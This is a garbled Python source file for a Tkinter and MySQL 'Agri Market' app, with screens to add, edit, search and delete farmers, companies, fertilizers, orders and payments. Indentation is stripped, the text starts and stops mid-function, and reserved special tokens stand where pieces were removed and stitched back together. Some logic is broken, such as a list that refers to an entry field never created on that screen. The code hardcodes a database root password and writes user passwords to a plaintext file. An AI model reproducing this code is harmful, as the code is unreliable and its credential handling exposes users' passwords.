arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_fe)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_fer()
<|reserved_special_token_0|>
def search_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertlizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_fe)
Button.place(x=400, y=400)
def search_fe():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=
fertilizer)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['fertilizer formula: ', 'fertilizer name: ',
'fertilizer content: ', 'fertilizer price: ', 'company_id: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Fertilizer formula', font=(
'times new roman', 15))
l.place(x=100, y=300)
search_fer()
def orders():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Orders Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_ord)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_ord)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_ord)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_ord)
Button.place(x=410, y=50)
view_ord()
def view_ord():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',
'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand
=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('or_id', text='Order Id')
table.heading('or_date', text='Order Date')
table.heading('or_fid', text='Ordered Farmer Id')
table.heading('or_formula', text='Order (item)formula')
table.heading('or_to', text='Order to')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM orders;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_ord():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=10)
label = Label(root, text='Order date', font=('Times new roman', 20), bg
='white')
label.place(x=50, y=60)
label = Label(root, text='Order FID', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=110)
label = Label(root, text='Order formula', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=160)
label = Label(root, text='Order to', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e2.insert(0, datetime.now())
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_ord_command)
Button.place(x=400, y=400)
def insert_ord_command():
try:
sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
orders()
except:
insert_ord()
def delete_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_ord_command)
Button.place(x=400, y=400)
def delete_ord_command():
try:
sql = 'DELETE FROM orders WHERE or_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
orders()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_or():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM orders WHERE or_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Order Id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Order Date', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=60)
label = Label(root, text='Order f_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Order formula', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Order to', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_ord)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Order_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_ord()
def update_command_ord():
sql = (
'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'
)
vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()
cur.executemany(sql, [vals])
db.commit()
orders()
def search_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_or)
Button.place(x=400, y=400)
def search_or():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM orders WHERE or_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['order Id: ', 'Order date: ', 'Order fid: ',
'Order formula: ', 'order to: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid order id', font=('times new roman', 15))
l.place(x=100, y=300)
search_ord()
def payment():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Payment Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_pay)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_pay)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_pay)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_pay)
Button.place(x=410, y=50)
view_pay()
def view_pay():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id', text='Transaction Id')
table.heading('p_f_id', text='Farmer Id')
table.heading('p_date', text='Payment Date')
table.heading('p_amount', text='Amount')
table.heading('p_method', text='Payment Method')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM payment;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_pay():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Transaction farmer id', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Transaction date', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Transaction amount', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Transaction method', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e3.insert(0, datetime.now())
e4.place(x=350, y=160)
e5 = StringVar(root)
e5.set('Debit card')
w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')
w.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_pay_command)
Button.place(x=400, y=400)
def insert_pay_command():
try:
sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
payment()
except:
insert_pay()
def delete_pay():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id:', font=('Times new roman', 20
), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_pay_command)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
def search_pay():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id:', font=('Times new roman', 20
), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_pa)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def First_page(root):
global T1, T2, T3
frame = Frame(root, height=500, width=800, bg='ivory')
frame.pack()
label = Label(root, text='WELCOME TO AGRI MARKET', font=(
'Times new roman', 25))
label.place(x=200, y=50)
button = Button(root, text='LogIn', font=('times new roman', 20),
command=check_pass, bg='green')
button.place(x=350, y=350)
L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width=30, bd=5)
T1.place(x=280, y=200)
L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width=30, show='*', bd=5)
T2.place(x=280, y=250)
reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=
'blue', command=create_pass)
reg_button.place(x=340, y=400)
<|reserved_special_token_0|>
def create_pass():
global root, T1, T2, T3
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'ivory')
label.place(x=0, y=0)
L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width=30, bd=5)
T1.place(x=380, y=200)
L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width=30, show='*', bd=5)
T2.place(x=380, y=250)
L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),
bg='ivory')
L2.place(x=150, y=300)
T3 = tk.Entry(root, width=30, show='*', bd=5)
T3.place(x=380, y=300)
reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=
'blue', command=add_pass)
reg_button.place(x=440, y=400)
def add_pass():
global root, T1, T2, T3
if T2.get() != T3.get():
label = Label(root, text='Incorrect Password. Enter again', font=(
'times new roman', 20))
label.place(x=100, y=100)
else:
try:
with open('password.txt', 'r') as f:
data = f.read()
with open('password.txt', 'w') as f:
f.write(data + '\n')
f.write(T1.get() + '=' + T2.get())
entity_page()
except:
with open('password.txt', 'w') as f:
f.write(T1.get() + '=' + T2.get())
entity_page()
def entity_page():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'ivory')
label.place(x=0, y=0)
label = Label(root, text='WELCOME TO AGRI MARKET ', font=(
'Times new roman', 20), bg='blue')
label.place(x=200, y=20)
label = Label(root, text='Choose the Entity ', font=('Times new roman',
20), bg='white')
label.place(x=250, y=100)
Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer
)
Button.place(x=100, y=150 + 25)
Button = tk.Button(root, text='Company', font=('Arial', 15), command=
company)
Button.place(x=300, y=150 + 25)
Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command
=fertilizer)
Button.place(x=500, y=150 + 25)
Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)
Button.place(x=200, y=300 + 25)
Button = tk.Button(root, text='Payment', font=('Arial', 15), command=
payment)
Button.place(x=400, y=300 + 25)
Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),
command=history)
Button.place(x=200, y=400 + 25)
def history():
global root, cur, db
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])
data = cur.fetchall()
label = Label(root, text='The Transaction History of this month', font=
('Arial', 15))
label.place(x=200, y=20)
button = Button(root, text='BACK', command=entity_page)
button.place(x=20, y=20)
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id', text='Transaction Id')
table.heading('p_f_id', text='Farmer Id')
table.heading('p_date', text='Payment Date')
table.heading('p_amount', text='Amount')
table.heading('p_method', text='Payment Method')
table['show'] = 'headings'
table.pack()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
db.close()
db = mysql.connector.connect(host='localhost', user='root', passwd=
'bhushi', database='farmer_app')
cur = db.cursor()
<|reserved_special_token_0|>
def view_farmer():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',
'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('f_id', text='Farmer Id')
table.heading('f_name', text='Farmer Name')
table.heading('f_phone', text='Farmer Phone')
table.heading('f_mail', text='Farmer Mail')
table.heading('f_locality', text='Farmer Locality')
table.heading('f_address', text='Farmer Address')
table['show'] = 'headings'
table.column('f_id', width=100)
table.pack()
cur.execute('SELECT * FROM farmer;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_farmer():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=10)
label = Label(root, text='Farmer_name', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=60)
label = Label(root, text='Farmer_phone', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Farmer_mail', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=160)
label = Label(root, text='Farmer_locality', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=210)
label = Label(root, text='Farmer_address', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=270)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e6 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
e6.place(x=350, y=270)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_farmer_command)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
def invalid(page):
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
if page == 'farmer':
label = Label(root, text='Enter valid farmer_id', font=(
'Times new roman', 30), bg='white')
label.place(x=170, y=200)
button = Button(root, text='Re-enter', font=('Times new roman', 20),
command=insert_farmer)
button.place(x=300, y=400)
elif page == 'company':
label = Label(root, text='Enter valid company_id', font=(
'Times new roman', 30), bg='white')
label.place(x=170, y=200)
button = Button(root, text='Re-enter', font=('Times new roman', 20),
command=insert_company)
button.place(x=300, y=400)
<|reserved_special_token_0|>
def delete_farmer_command():
try:
sql = 'DELETE FROM farmer WHERE f_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
farmer()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_farmer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)
Button.place(x=300, y=400)
<|reserved_special_token_0|>
def update_command():
try:
sql = (
'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'
)
vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()
cur.executemany(sql, [vals])
db.commit()
farmer()
except:
update_farmer()
def search_farmer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)
Button.place(x=400, y=400)
def search():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM farmer WHERE f_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',
'farmer mail: ', 'farmer locality: ', 'farmer address: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))
l.place(x=100, y=300)
search_farmer()
def company():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_company)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_company)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_company)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_company)
Button.place(x=410, y=50)
view_company()
def view_company():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),
xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('c_id', text='Company Id')
table.heading('c_name', text='Company Name')
table.heading('c_address', text='Company Address')
table['show'] = 'headings'
table.column('c_id', width=100)
table.pack()
cur.execute('SELECT * FROM company;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
def insert_company():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company_id', font=('Times new roman', 20), bg
='white')
label.place(x=50, y=10)
label = Label(root, text='Company_name', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Company_address', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=110)
e3.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_company_command)
Button.place(x=400, y=400)
def insert_company_command():
try:
if len(e1.get()) > 3:
invalid('company')
else:
sql = 'INSERT INTO company values(%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get()
cur.executemany(sql, [vals])
db.commit()
company()
except:
insert_company()
def delete_company():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Id:', font=('Times new roman', 20),
bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_company_command)
Button.place(x=400, y=400)
def delete_company_command():
try:
sql = 'DELETE FROM company WHERE c_id=%s;'
cur.execute(sql, [int(e1.get())])
db.commit()
company()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_c():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM company WHERE c_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Company_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Company_name', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Company_address', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=110)
e3.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_c)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_company()
<|reserved_special_token_0|>
def search_company():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Id:', font=('Times new roman', 20),
bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_c)
Button.place(x=400, y=400)
def search_c():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM company WHERE c_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=company
)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['company id: ', 'company name: ', 'company address: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Company Id', font=('times new roman', 15)
)
l.place(x=100, y=300)
search_company()
def fertilizer():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertilizer Table', font=('Times new roman',
15), bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_fer)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_fer)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_fer)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_fer)
Button.place(x=410, y=50)
view_fer()
def view_fer():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',
'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.
set, yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('fe_formula', text='Fertilizer Formula')
table.heading('fe_name', text='Fertilizer name')
table.heading('fe_content', text='Fertilizer content')
table.heading('fe_price', text='Fertilizer price')
table.heading('company_id', text='Company_id')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM fertilizer;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_fer_command():
try:
sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
fertilizer()
except:
insert_fer()
def delete_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertilizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_fer_command)
Button.place(x=400, y=400)
def delete_fer_command():
try:
sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'
cur.execute(sql, [e1.get()])
db.commit()
fertilizer()
except:
